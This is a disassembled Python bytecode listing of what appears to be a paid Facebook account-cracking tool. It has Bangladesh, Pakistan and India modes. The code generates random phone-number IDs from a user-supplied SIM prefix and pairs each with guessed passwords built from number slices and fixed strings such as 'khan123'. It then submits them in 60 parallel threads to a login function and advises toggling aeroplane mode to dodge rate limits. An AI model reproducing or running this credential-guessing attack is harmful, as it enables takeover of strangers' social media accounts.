                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              59 (']')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                BUILD_STRING             7
                STORE_NAME              81 (xd6)
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              25 ('[')
                LOAD_NAME               69 (G3)
                FORMAT_SIMPLE
                LOAD_CONST              75 ('0')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              59 (']')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                BUILD_STRING             7
                STORE_NAME              82 (xd0)
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              25 ('[')
                LOAD_NAME               69 (G3)
                FORMAT_SIMPLE
                LOAD_CONST              76 ('?')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                LOAD_CONST              59 (']')
                LOAD_NAME               32 (W)
                FORMAT_SIMPLE
                BUILD_STRING             7
                STORE_NAME              83 (xdx)

  71            LOAD_CONST              77 ('\x1b[1;31m')
                STORE_NAME              84 (r)

  72            LOAD_CONST              62 ('\x1b[1;32m')
                STORE_NAME              85 (g)

  73            LOAD_CONST              70 ('\x1b[1;34m')
                STORE_NAME              86 (b)

  74            LOAD_CONST              78 ('\x1b[1;35m')
                STORE_NAME              87 (p)

  75            LOAD_CONST              79 ('\x1b[1;36m')
                STORE_NAME              88 (m)

  76            LOAD_CONST              80 ('\x1b[1;37m')
                STORE_NAME              89 (w)

  77            LOAD_CONST               0 (0)
                STORE_NAME              90 (loop)

  78            BUILD_LIST               0
                STORE_NAME              91 (oks)

  80            NOP

  83            LOAD_CONST              81 (<code object logo at 0x6ed60f4220, file "<x>", line 83>)
                MAKE_FUNCTION
                STORE_NAME              92 (logo)

  99            LOAD_CONST              82 (<code object Main at 0x6ed60f7190, file "<x>", line 99>)
                MAKE_FUNCTION
                STORE_NAME              93 (Main)

 109            LOAD_CONST              83 (<code object rmenu1 at 0x70b60a3aa0, file "<x>", line 109>)
                MAKE_FUNCTION
                STORE_NAME              94 (rmenu1)

 139            LOAD_CONST               0 (0)
                LOAD_CONST               1 (None)
                IMPORT_NAME              2 (random)
                STORE_NAME               2 (random)

 140            LOAD_CONST               0 (0)
                LOAD_CONST               1 (None)
                IMPORT_NAME              8 (uuid)
                STORE_NAME               8 (uuid)

 142            LOAD_CONST              84 (<code object dalvik_ua_pro at 0x6e35daf550, file "<x>", line 142>)
                MAKE_FUNCTION
                STORE_NAME              95 (dalvik_ua_pro)

 174            BUILD_LIST               0
                STORE_GLOBAL            96 (lk)

 175            LOAD_CONST              85 (<code object graphrm at 0x6eb60ab110, file "<x>", line 175>)
                MAKE_FUNCTION
                STORE_NAME              97 (graphrm)

 214            LOAD_NAME               93 (Main)
                PUSH_NULL
                CALL                     0
                POP_TOP
                RETURN_CONST             1 (None)

  --    L5:     PUSH_EXC_INFO

   9            POP_TOP
        L6:     POP_EXCEPT
                EXTENDED_ARG             2
                JUMP_BACKWARD_NO_INTERRUPT 591 (to L2)

  --    L7:     COPY                     3
                POP_EXCEPT
                RERAISE                  1
        L8:     PUSH_EXC_INFO

  14            LOAD_NAME               20 (Exception)
                CHECK_EXC_MATCH
                POP_JUMP_IF_FALSE       11 (to L11)
                STORE_NAME              21 (e)
        L9:     POP_EXCEPT
                LOAD_CONST               1 (None)
                STORE_NAME              21 (e)
                DELETE_NAME             21 (e)
                EXTENDED_ARG             2
                JUMP_BACKWARD_NO_INTERRUPT 535 (to L4)

  --   L10:     LOAD_CONST               1 (None)
                STORE_NAME              21 (e)
                DELETE_NAME             21 (e)
                RERAISE                  1

  14   L11:     RERAISE                  0

  --   L12:     COPY                     3
                POP_EXCEPT
                RERAISE                  1
ExceptionTable:
  L1 to L2 -> L5 [0]
  L3 to L4 -> L8 [0]
  L5 to L6 -> L7 [1] lasti
  L8 to L9 -> L12 [1] lasti
  L10 to L12 -> L12 [1] lasti

Disassembly of <code object line at 0x6e35d92c30, file "<x>", line 51>:
 51           RESUME                   0

 52           LOAD_GLOBAL              1 (print + NULL)
              LOAD_GLOBAL              2 (G3)
              FORMAT_SIMPLE
              LOAD_CONST               1 ('━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━')
              LOAD_GLOBAL              4 (W)
              FORMAT_SIMPLE
              BUILD_STRING             3
              CALL                     1
              POP_TOP
              RETURN_CONST             0 (None)

Disassembly of <code object logo at 0x6ed60f4220, file "<x>", line 83>:
 83           RESUME                   0

 84           LOAD_GLOBAL              0 (os)
              LOAD_ATTR                2 (system)
              PUSH_NULL
              LOAD_CONST               1 ('clear')
              CALL                     1
              POP_TOP
              LOAD_GLOBAL              5 (print + NULL)
              LOAD_CONST               2 ('')
              LOAD_ATTR                7 (join + NULL|self)
              BUILD_LIST               0
              LOAD_CONST               3 ('\n ')
              LIST_APPEND              1

 85           LOAD_GLOBAL              8 (G1)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 85           LOAD_CONST               4 ('███████ ██ ███████  █████  ████████ \n ')

 84           LIST_APPEND              1

 86           LOAD_GLOBAL              8 (G1)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 86           LOAD_CONST               5 ('██      ██ ██      ██   ██    ██    \n ')

 84           LIST_APPEND              1

 87           LOAD_GLOBAL             10 (G2)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 87           LOAD_CONST               6 ('███████ ██ █████   ███████    ██    \n      ')

 84           LIST_APPEND              1

 88           LOAD_GLOBAL             12 (G3)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 88           LOAD_CONST               7 ('██ ██ ██      ██   ██    ██    \n ')

 84           LIST_APPEND              1

 89           LOAD_GLOBAL             14 (G4)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 89           LOAD_CONST               8 ('███████ ██ ██      ██   ██    ██')
 84           LIST_APPEND              1

 89           LOAD_GLOBAL             16 (W)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 89           LOAD_CONST               9 ('\n\n')

 84           LIST_APPEND              1

 90           LOAD_GLOBAL             12 (G3)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 90           LOAD_CONST              10 ('━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n \x1b[1;97m[\x1b[38;5;48m•\x1b[1;97m]\x1b[1;97m OWNER      : SHAHIN MOJUMDER\n ')

 84           LIST_APPEND              1

 92           LOAD_GLOBAL             16 (W)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 92           LOAD_CONST              11 ('[')

 84           LIST_APPEND              1

 92           LOAD_GLOBAL             12 (G3)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 92           LOAD_CONST              12 ('•')

 84           LIST_APPEND              1

 92           LOAD_GLOBAL             16 (W)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 92           LOAD_CONST              13 (']')

 84           LIST_APPEND              1

 92           LOAD_GLOBAL             16 (W)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 92           LOAD_CONST              14 (' GITHUB     : SHAHIN\n ')

 84           LIST_APPEND              1

 93           LOAD_GLOBAL             16 (W)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 93           LOAD_CONST              11 ('[')

 84           LIST_APPEND              1

 93           LOAD_GLOBAL             12 (G3)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 93           LOAD_CONST              12 ('•')

 84           LIST_APPEND              1

 93           LOAD_GLOBAL             16 (W)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 93           LOAD_CONST              13 (']')

 84           LIST_APPEND              1

 93           LOAD_GLOBAL             16 (W)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 93           LOAD_CONST              15 (' FACEBOOK   : SHAHIN \n ')

 84           LIST_APPEND              1

 94           LOAD_GLOBAL             16 (W)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 94           LOAD_CONST              11 ('[')

 84           LIST_APPEND              1

 94           LOAD_GLOBAL             12 (G3)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 94           LOAD_CONST              12 ('•')

 84           LIST_APPEND              1

 94           LOAD_GLOBAL             16 (W)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 94           LOAD_CONST              13 (']')

 84           LIST_APPEND              1

 94           LOAD_GLOBAL             16 (W)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 94           LOAD_CONST              16 (' TOOL       : RANDOM\n ')

 84           LIST_APPEND              1

 95           LOAD_GLOBAL             16 (W)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 95           LOAD_CONST              11 ('[')

 84           LIST_APPEND              1

 95           LOAD_GLOBAL             12 (G3)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 95           LOAD_CONST              12 ('•')

 84           LIST_APPEND              1

 95           LOAD_GLOBAL             16 (W)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 95           LOAD_CONST              13 (']')

 84           LIST_APPEND              1

 95           LOAD_GLOBAL             16 (W)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 95           LOAD_CONST              17 (' TYPE       : PAID\n ')

 84           LIST_APPEND              1

 96           LOAD_GLOBAL             16 (W)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 96           LOAD_CONST              11 ('[')

 84           LIST_APPEND              1

 96           LOAD_GLOBAL             12 (G3)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 96           LOAD_CONST              12 ('•')

 84           LIST_APPEND              1

 96           LOAD_GLOBAL             16 (W)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 96           LOAD_CONST              13 (']')

 84           LIST_APPEND              1

 96           LOAD_GLOBAL             16 (W)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 96           LOAD_CONST              18 (' VERSION    : 0.02                      \n')

 84           LIST_APPEND              1

 97           LOAD_GLOBAL             12 (G3)
              FORMAT_SIMPLE

 84           LIST_APPEND              1

 97           LOAD_CONST              19 ('━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━')

 84           LIST_APPEND              1
              CALL                     1
              CALL                     1
              POP_TOP
              RETURN_CONST             0 (None)

Disassembly of <code object Main at 0x6ed60f7190, file "<x>", line 99>:
 99           RESUME                   0

100           LOAD_GLOBAL              1 (logo + NULL)
              CALL                     0
              POP_TOP

101           LOAD_GLOBAL              3 (print + NULL)
              LOAD_CONST               1 (' \x1b[1;97m[\x1b[1;92mA\x1b[1;97m]\x1b[1;97mRANDOM CRACK [')
              LOAD_GLOBAL              4 (G)
              FORMAT_SIMPLE
              LOAD_CONST               2 ('BANGLADESH')
              LOAD_GLOBAL              6 (W)
              FORMAT_SIMPLE
              LOAD_CONST               3 (']')
              BUILD_STRING             5
              CALL                     1
              POP_TOP
              LOAD_GLOBAL              3 (print + NULL)
              LOAD_CONST               4 (' ')
              LOAD_GLOBAL              6 (W)
              FORMAT_SIMPLE
              LOAD_CONST               5 ('[')
              LOAD_GLOBAL              4 (G)
              FORMAT_SIMPLE
              LOAD_CONST               6 ('B')
              LOAD_GLOBAL              6 (W)
              FORMAT_SIMPLE
              LOAD_CONST               3 (']')
              LOAD_GLOBAL              6 (W)
              FORMAT_SIMPLE
              LOAD_CONST               7 ('RANDOM CRACK [')
              LOAD_GLOBAL              4 (G)
              FORMAT_SIMPLE
              LOAD_CONST               8 ('PAKISTAN')
              LOAD_GLOBAL              6 (W)
              FORMAT_SIMPLE
              LOAD_CONST               3 (']')
              BUILD_STRING            13
              CALL                     1
              POP_TOP
              LOAD_GLOBAL              3 (print + NULL)
              LOAD_CONST               4 (' ')
              LOAD_GLOBAL              6 (W)
              FORMAT_SIMPLE
              LOAD_CONST               5 ('[')
              LOAD_GLOBAL              4 (G)
              FORMAT_SIMPLE
              LOAD_CONST               9 ('C')
              LOAD_GLOBAL              6 (W)
              FORMAT_SIMPLE
              LOAD_CONST               3 (']')
              LOAD_GLOBAL              6 (W)
              FORMAT_SIMPLE
              LOAD_CONST               7 ('RANDOM CRACK [')
              LOAD_GLOBAL              4 (G)
              FORMAT_SIMPLE
              LOAD_CONST              10 ('INDIA')
              LOAD_GLOBAL              6 (W)
              FORMAT_SIMPLE
              LOAD_CONST               3 (']')
              BUILD_STRING            13
              CALL                     1
              POP_TOP

102           LOAD_GLOBAL              9 (line + NULL)
              CALL                     0
              POP_TOP

103           LOAD_GLOBAL             11 (input + NULL)
              LOAD_CONST              11 (' [')
              LOAD_GLOBAL              4 (G)
              FORMAT_SIMPLE
              LOAD_CONST              12 ('+')
              LOAD_GLOBAL              6 (W)
              FORMAT_SIMPLE
              LOAD_CONST              13 ('] Choice : ')
              LOAD_GLOBAL              4 (G)
              FORMAT_SIMPLE
              BUILD_STRING             6
              CALL                     1
              STORE_FAST               0 (ghx)

104           LOAD_FAST                0 (ghx)
              LOAD_CONST              14 (('A', 'a', '1'))
              CONTAINS_OP              0
              POP_JUMP_IF_FALSE       32 (to L1)
              LOAD_GLOBAL             12 (rcd)
              LOAD_ATTR               15 (append + NULL|self)
              LOAD_CONST              15 ('1')
              CALL                     1
              POP_TOP
              LOAD_GLOBAL             17 (rmenu1 + NULL)
              CALL                     0
              POP_TOP
              RETURN_CONST             0 (None)

105   L1:     LOAD_FAST                0 (ghx)
              LOAD_CONST              16 (('B', 'b', '2'))
              CONTAINS_OP              0
              POP_JUMP_IF_FALSE       32 (to L2)
              LOAD_GLOBAL             12 (rcd)
              LOAD_ATTR               15 (append + NULL|self)
              LOAD_CONST              17 ('2')
              CALL                     1
              POP_TOP
              LOAD_GLOBAL             17 (rmenu1 + NULL)
              CALL                     0
              POP_TOP
              RETURN_CONST             0 (None)

106   L2:     LOAD_FAST                0 (ghx)
              LOAD_CONST              18 (('C', 'c', '3'))
              CONTAINS_OP              0
              POP_JUMP_IF_FALSE       32 (to L3)
              LOAD_GLOBAL             12 (rcd)
              LOAD_ATTR               15 (append + NULL|self)
              LOAD_CONST              19 ('3')
              CALL                     1
              POP_TOP
              LOAD_GLOBAL             17 (rmenu1 + NULL)
              CALL                     0
              POP_TOP
              RETURN_CONST             0 (None)

107   L3:     LOAD_GLOBAL              9 (line + NULL)
              CALL                     0
              POP_TOP
              LOAD_GLOBAL              3 (print + NULL)
              LOAD_CONST              20 ('\n \t ')
              LOAD_GLOBAL             18 (R)
              FORMAT_SIMPLE
              LOAD_CONST              21 ('Choose valid option')
              LOAD_GLOBAL             20 (E)
              FORMAT_SIMPLE
              BUILD_STRING             4
              CALL                     1
              POP_TOP
              LOAD_GLOBAL             22 (time)
              LOAD_ATTR               24 (sleep)
              PUSH_NULL
              LOAD_CONST              22 (1)
              CALL                     1
              POP_TOP
              LOAD_GLOBAL             27 (Main + NULL)
              CALL                     0
              POP_TOP
              RETURN_CONST             0 (None)

Disassembly of <code object rmenu1 at 0x70b60a3aa0, file "<x>", line 109>:
 109            RESUME                   0

 110            LOAD_GLOBAL              1 (logo + NULL)
                CALL                     0
                POP_TOP

 111            LOAD_CONST               1 ('1')
                LOAD_GLOBAL              2 (rcd)
                CONTAINS_OP              0
                POP_JUMP_IF_FALSE       26 (to L1)
                LOAD_GLOBAL              5 (print + NULL)
                LOAD_GLOBAL              6 (BDX)
                FORMAT_SIMPLE
                CALL                     1
                POP_TOP
                LOAD_GLOBAL              9 (line + NULL)
                CALL                     0
                POP_TOP

 112    L1:     LOAD_CONST               2 ('2')
                LOAD_GLOBAL              2 (rcd)
                CONTAINS_OP              0
                POP_JUMP_IF_FALSE       26 (to L2)
                LOAD_GLOBAL              5 (print + NULL)
                LOAD_GLOBAL             10 (PAKX)
                FORMAT_SIMPLE
                CALL                     1
                POP_TOP
                LOAD_GLOBAL              9 (line + NULL)
                CALL                     0
                POP_TOP

 113    L2:     LOAD_CONST               3 ('3')
                LOAD_GLOBAL              2 (rcd)
                CONTAINS_OP              0
                POP_JUMP_IF_FALSE       26 (to L3)
                LOAD_GLOBAL              5 (print + NULL)
                LOAD_GLOBAL             12 (INDX)
                FORMAT_SIMPLE
                CALL                     1
                POP_TOP
                LOAD_GLOBAL              9 (line + NULL)
                CALL                     0
                POP_TOP

 114    L3:     LOAD_GLOBAL             15 (input + NULL)
                LOAD_GLOBAL             16 (chc)
                FORMAT_SIMPLE
                CALL                     1
                STORE_FAST               0 (code)
                LOAD_GLOBAL              5 (print + NULL)
                LOAD_GLOBAL             18 (G3)
                FORMAT_SIMPLE
                LOAD_CONST               4 ('━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━')
                LOAD_GLOBAL             20 (W)
                FORMAT_SIMPLE
                BUILD_STRING             3
                CALL                     1
                POP_TOP

 115            LOAD_GLOBAL              5 (print + NULL)
                LOAD_GLOBAL             22 (LIMITX)
                FORMAT_SIMPLE
                CALL                     1
                POP_TOP
                LOAD_GLOBAL              9 (line + NULL)
                CALL                     0
                POP_TOP

 116            LOAD_GLOBAL             25 (int + NULL)
                LOAD_GLOBAL             15 (input + NULL)
                LOAD_CONST               5 (' ')
                LOAD_GLOBAL             20 (W)
                FORMAT_SIMPLE
                LOAD_CONST               6 ('[')
                LOAD_GLOBAL             18 (G3)
                FORMAT_SIMPLE
                LOAD_CONST               7 ('•')
                LOAD_GLOBAL             20 (W)
                FORMAT_SIMPLE
                LOAD_CONST               8 (']')
                LOAD_GLOBAL             20 (W)
                FORMAT_SIMPLE
                LOAD_CONST               9 (' Limit : ')
                LOAD_GLOBAL             26 (G)
                FORMAT_SIMPLE
                BUILD_STRING            10
                CALL                     1
                CALL                     1
                STORE_FAST               1 (limit)

 117            LOAD_GLOBAL              5 (print + NULL)
                LOAD_GLOBAL             18 (G3)
                FORMAT_SIMPLE
                LOAD_CONST               4 ('━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━')
                LOAD_GLOBAL             20 (W)
                FORMAT_SIMPLE
                BUILD_STRING             3
                CALL                     1
                POP_TOP
                LOAD_GLOBAL              5 (print + NULL)
                LOAD_GLOBAL             28 (CPG)
                FORMAT_SIMPLE
                CALL                     1
                POP_TOP
                LOAD_GLOBAL              9 (line + NULL)
                CALL                     0
                POP_TOP

 118            LOAD_GLOBAL             15 (input + NULL)
                LOAD_CONST               6 ('[')
                LOAD_GLOBAL             16 (chc)
                FORMAT_SIMPLE
                BUILD_STRING             2
                CALL                     1
                STORE_FAST               2 (cx)

 119            LOAD_FAST                2 (cx)
                LOAD_CONST              10 (('n', 'N', 'no', 'NO', '2'))
                CONTAINS_OP              0
                POP_JUMP_IF_FALSE       22 (to L4)
                LOAD_GLOBAL             30 (cpx)
                LOAD_ATTR               33 (append + NULL|self)
                LOAD_CONST              11 ('n')
                CALL                     1
                POP_TOP
                JUMP_FORWARD            21 (to L5)

 120    L4:     LOAD_GLOBAL             30 (cpx)
                LOAD_ATTR               33 (append + NULL|self)
                LOAD_CONST              12 ('y')
                CALL                     1
                POP_TOP

 121    L5:     LOAD_GLOBAL              5 (print + NULL)
                LOAD_GLOBAL             18 (G3)
                FORMAT_SIMPLE
                LOAD_CONST               4 ('━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━')
                LOAD_GLOBAL             20 (W)
                FORMAT_SIMPLE
                BUILD_STRING             3
                CALL                     1
                POP_TOP
                LOAD_GLOBAL              5 (print + NULL)
                LOAD_GLOBAL             34 (CKIG)
                FORMAT_SIMPLE
                CALL                     1
                POP_TOP
                LOAD_GLOBAL              9 (line + NULL)
                CALL                     0
                POP_TOP

 122            LOAD_GLOBAL             15 (input + NULL)
                LOAD_GLOBAL             16 (chc)
                FORMAT_SIMPLE
                CALL                     1
                STORE_FAST               3 (ckiv)

 123            LOAD_FAST                3 (ckiv)
                LOAD_CONST              10 (('n', 'N', 'no', 'NO', '2'))
                CONTAINS_OP              0
                POP_JUMP_IF_FALSE       22 (to L6)
                LOAD_GLOBAL             36 (cokix)
                LOAD_ATTR               33 (append + NULL|self)
                LOAD_CONST              11 ('n')
                CALL                     1
                POP_TOP
                JUMP_FORWARD            21 (to L7)

 124    L6:     LOAD_GLOBAL             36 (cokix)
                LOAD_ATTR               33 (append + NULL|self)
                LOAD_CONST              12 ('y')
                CALL                     1
                POP_TOP

 125    L7:     LOAD_GLOBAL             39 (range + NULL)
                LOAD_FAST                1 (limit)
                CALL                     1
                GET_ITER
        L8:     FOR_ITER               197 (to L12)
                STORE_FAST               4 (number)

 126            LOAD_CONST               1 ('1')
                LOAD_GLOBAL              2 (rcd)
                CONTAINS_OP              0
                POP_JUMP_IF_FALSE       54 (to L9)
                LOAD_CONST              13 ('')
                LOAD_ATTR               41 (join + NULL|self)
                LOAD_CONST              14 (<code object <genexpr> at 0x6e35da8170, file "<x>", line 126>)
                MAKE_FUNCTION
                LOAD_GLOBAL             39 (range + NULL)
                LOAD_CONST              15 (8)
                CALL                     1
                GET_ITER
                CALL                     0
                CALL                     1
                STORE_FAST               5 (numberx)
                LOAD_GLOBAL             42 (xode)
                LOAD_ATTR               33 (append + NULL|self)
                LOAD_FAST                5 (numberx)
                CALL                     1
                POP_TOP

 127    L9:     LOAD_CONST               2 ('2')
                LOAD_GLOBAL              2 (rcd)
                CONTAINS_OP              0
                POP_JUMP_IF_FALSE       54 (to L10)
                LOAD_CONST              13 ('')
                LOAD_ATTR               41 (join + NULL|self)
                LOAD_CONST              16 (<code object <genexpr> at 0x6e35da83f0, file "<x>", line 127>)
                MAKE_FUNCTION
                LOAD_GLOBAL             39 (range + NULL)
                LOAD_CONST              17 (7)
                CALL                     1
                GET_ITER
                CALL                     0
                CALL                     1
                STORE_FAST               5 (numberx)
                LOAD_GLOBAL             42 (xode)
                LOAD_ATTR               33 (append + NULL|self)
                LOAD_FAST                5 (numberx)
                CALL                     1
                POP_TOP

 128   L10:     LOAD_CONST               3 ('3')
                LOAD_GLOBAL              2 (rcd)
                CONTAINS_OP              0
                POP_JUMP_IF_TRUE         2 (to L11)
                JUMP_BACKWARD          143 (to L8)
       L11:     LOAD_CONST              13 ('')
                LOAD_ATTR               41 (join + NULL|self)
                LOAD_CONST              18 (<code object <genexpr> at 0x6e35da8530, file "<x>", line 128>)
                MAKE_FUNCTION
                LOAD_GLOBAL             39 (range + NULL)
                LOAD_CONST              19 (6)
                CALL                     1
                GET_ITER
                CALL                     0
                CALL                     1
                STORE_FAST               5 (numberx)
                LOAD_GLOBAL             42 (xode)
                LOAD_ATTR               33 (append + NULL|self)
                LOAD_FAST                5 (numberx)
                CALL                     1
                POP_TOP
                JUMP_BACKWARD          199 (to L8)

 125   L12:     END_FOR
                POP_TOP

 129            LOAD_GLOBAL             45 (ThreadPool + NULL)
                LOAD_CONST              20 (60)
                LOAD_CONST              21 (('max_workers',))
                CALL_KW                  1
                BEFORE_WITH
       L13:     STORE_FAST               6 (tonxoys)

 130            LOAD_GLOBAL             47 (str + NULL)
                LOAD_GLOBAL             49 (len + NULL)
                LOAD_GLOBAL             42 (xode)
                CALL                     1
                CALL                     1
                STORE_FAST               7 (tid)

 131            LOAD_GLOBAL              1 (logo + NULL)
                CALL                     0
                POP_TOP
                LOAD_GLOBAL              5 (print + NULL)
                LOAD_CONST               5 (' ')
                LOAD_GLOBAL             20 (W)
                FORMAT_SIMPLE
                LOAD_CONST               6 ('[')
                LOAD_GLOBAL             18 (G3)
                FORMAT_SIMPLE
                LOAD_CONST               7 ('•')
                LOAD_GLOBAL             20 (W)
                FORMAT_SIMPLE
                LOAD_CONST               8 (']')
                LOAD_GLOBAL             20 (W)
                FORMAT_SIMPLE
                LOAD_CONST              22 ('TOTAL ID :\x1b[1;92m ')
                BUILD_STRING             9
                LOAD_FAST                7 (tid)
                BINARY_OP                0 (+)
                CALL                     1
                POP_TOP
                LOAD_GLOBAL              5 (print + NULL)
                LOAD_CONST               5 (' ')
                LOAD_GLOBAL             20 (W)
                FORMAT_SIMPLE
                LOAD_CONST               6 ('[')
                LOAD_GLOBAL             26 (G)
                FORMAT_SIMPLE
                LOAD_CONST               7 ('•')
                LOAD_GLOBAL             20 (W)
                FORMAT_SIMPLE
                LOAD_CONST              23 (']\x1b[1;97mSIM CODE : \x1b[1;92m')
                BUILD_STRING             7
                LOAD_FAST                0 (code)
                BINARY_OP                0 (+)
                CALL                     1
                POP_TOP
                LOAD_GLOBAL              5 (print + NULL)
                LOAD_CONST               5 (' ')
                LOAD_GLOBAL             20 (W)
                FORMAT_SIMPLE
                LOAD_CONST               6 ('[')
                LOAD_GLOBAL             26 (G)
                FORMAT_SIMPLE
                LOAD_CONST               7 ('•')
                LOAD_GLOBAL             20 (W)
                FORMAT_SIMPLE
                LOAD_CONST              24 (']\x1b[1;37mTHE PROCESS HAS BEEN STARTED')
                BUILD_STRING             7
                CALL                     1
                POP_TOP
                LOAD_GLOBAL              5 (print + NULL)
                LOAD_CONST              25 (' [')
                LOAD_GLOBAL             26 (G)
                FORMAT_SIMPLE
                LOAD_CONST               7 ('•')
                LOAD_GLOBAL             20 (W)
                FORMAT_SIMPLE
                LOAD_CONST              26 (']\x1b[1;37mUSE AEROPLANE MODE IN EVERY 5 MIN ')
                BUILD_STRING             5
                CALL                     1
                POP_TOP
                LOAD_GLOBAL              5 (print + NULL)
                LOAD_GLOBAL             18 (G3)
                FORMAT_SIMPLE
                LOAD_CONST               4 ('━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━')
                LOAD_GLOBAL             20 (W)
                FORMAT_SIMPLE
                BUILD_STRING             3
                CALL                     1
                POP_TOP

 132            LOAD_GLOBAL             42 (xode)
                GET_ITER
       L14:     FOR_ITER                96 (to L18)
                STORE_FAST               8 (rngx)

 133            LOAD_FAST_LOAD_FAST      8 (code, rngx)
                BINARY_OP                0 (+)
                STORE_FAST               9 (id)

 134            LOAD_CONST               1 ('1')
                LOAD_GLOBAL              2 (rcd)
                CONTAINS_OP              0
                POP_JUMP_IF_FALSE       19 (to L15)
                LOAD_FAST_LOAD_FAST    152 (id, rngx)
                LOAD_FAST                9 (id)
                LOAD_CONST               0 (None)
                LOAD_CONST              19 (6)
                BINARY_SLICE
                LOAD_FAST                9 (id)
                LOAD_CONST               0 (None)
                LOAD_CONST              17 (7)
                BINARY_SLICE
                LOAD_FAST                9 (id)
                LOAD_CONST               0 (None)
                LOAD_CONST              15 (8)
                BINARY_SLICE
                LOAD_FAST                9 (id)
                LOAD_CONST              27 (5)
                LOAD_CONST               0 (None)
                BINARY_SLICE
                BUILD_LIST               6
                STORE_FAST              10 (psd)

 135   L15:     LOAD_CONST               2 ('2')
                LOAD_GLOBAL              2 (rcd)
                CONTAINS_OP              0
                POP_JUMP_IF_FALSE        8 (to L16)
                LOAD_FAST_LOAD_FAST    152 (id, rngx)
                LOAD_FAST                9 (id)
                LOAD_CONST              27 (5)
                LOAD_CONST               0 (None)
                BINARY_SLICE
                LOAD_CONST              28 ('khan123')
                BUILD_LIST               4
                STORE_FAST              10 (psd)

 136   L16:     LOAD_CONST               3 ('3')
                LOAD_GLOBAL              2 (rcd)
                CONTAINS_OP              0
                POP_JUMP_IF_FALSE        8 (to L17)
                LOAD_FAST_LOAD_FAST    152 (id, rngx)
                LOAD_FAST                9 (id)
                LOAD_CONST               0 (None)
                LOAD_CONST              19 (6)
                BINARY_SLICE
                LOAD_CONST              29 ('57273200')
                BUILD_LIST               4
                STORE_FAST              10 (psd)

 137   L17:     LOAD_FAST                6 (tonxoys)
                LOAD_ATTR               51 (submit + NULL|self)
                LOAD_GLOBAL             52 (graphrm)
                LOAD_FAST                9 (id)
                LOAD_FAST_CHECK         10 (psd)
                LOAD_FAST                7 (tid)
                CALL                     4
                POP_TOP
                JUMP_BACKWARD           98 (to L14)

 132   L18:     END_FOR
                POP_TOP

 129   L19:     LOAD_CONST               0 (None)
                LOAD_CONST               0 (None)
                LOAD_CONST               0 (None)
                CALL                     2
                POP_TOP
                RETURN_CONST             0 (None)
       L20:     PUSH_EXC_INFO
                WITH_EXCEPT_START
                TO_BOOL
                POP_JUMP_IF_TRUE         1 (to L21)
                RERAISE                  2
       L21:     POP_TOP
       L22:     POP_EXCEPT
                POP_TOP
                POP_TOP
                RETURN_CONST             0 (None)

  --   L23:     COPY                     3
                POP_EXCEPT
                RERAISE                  1
ExceptionTable:
  L13 to L19 -> L20 [1] lasti
  L20 to L22 -> L23 [3] lasti

Disassembly of <code object <genexpr> at 0x6e35da8170, file "<x>", line 126>: 126           RETURN_GENERATOR
               POP_TOP
       L1:     RESUME                   0
               LOAD_FAST                0 (.0)
               GET_ITER
       L2:     FOR_ITER                41 (to L3)
               STORE_FAST               1 (_)
               LOAD_GLOBAL              0 (random)
               LOAD_ATTR                2 (choice)
               PUSH_NULL
               LOAD_GLOBAL              4 (string)
               LOAD_ATTR                6 (digits)
               CALL                     1
               YIELD_VALUE              0
               RESUME                   5
               POP_TOP
               JUMP_BACKWARD           43 (to L2)
       L3:     END_FOR
               POP_TOP
               RETURN_CONST             0 (None)

  --   L4:     CALL_INTRINSIC_1         3 (INTRINSIC_STOPITERATION_ERROR)
               RERAISE                  1
ExceptionTable:
  L1 to L4 -> L4 [0] lasti

Disassembly of <code object <genexpr> at 0x6e35da83f0, file "<x>", line 127>: 127           RETURN_GENERATOR
               POP_TOP
       L1:     RESUME                   0
               LOAD_FAST                0 (.0)
               GET_ITER
       L2:     FOR_ITER                41 (to L3)
               STORE_FAST               1 (_)
               LOAD_GLOBAL              0 (random)
               LOAD_ATTR                2 (choice)
               PUSH_NULL
               LOAD_GLOBAL              4 (string)
               LOAD_ATTR                6 (digits)
               CALL                     1
               YIELD_VALUE              0
               RESUME                   5
               POP_TOP
               JUMP_BACKWARD           43 (to L2)
       L3:     END_FOR
               POP_TOP
               RETURN_CONST             0 (None)

